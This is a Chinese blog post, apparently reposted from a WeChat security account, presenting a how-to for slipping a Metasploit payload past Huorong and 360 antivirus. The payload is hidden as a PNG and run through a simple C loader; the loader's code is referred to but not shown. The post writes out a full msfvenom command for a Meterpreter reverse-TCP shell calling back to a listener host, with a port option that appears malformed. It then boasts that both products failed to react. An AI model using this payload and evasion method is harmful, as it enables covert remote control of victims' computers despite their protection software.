“当我在进程里看见一只豆豆鞋时,我就知道我们都多余了” ——“360”“火绒”
🌳实现一个C加载器
上面的加载器用了很简单的实现,没有做任何加密解密的处理
下面的shellcode也不打算做任何加密解密的处理
🥗利用MSF生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.128 port=4444 -f raw -o shell.png
这里就是简单生成一个图片shellcode
不涉及加解密
📐把加载器编译成exe文件
这里先选好32位(X86)的release
然后
直接生成解决方案
得到exe文件
🎇运行程序测试效果
火绒静态查杀直接bypass
下面直接尝试在开启火绒的条件下运行,首先MSF开启监听:
直接运行:
火绒毫无反应
尝试弹个计算器:
都多余了!
360同理:
原文始发于微信公众号(猫因的安全):【免杀初探】宇将军亲传—利用C加载图片shellcode免杀
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论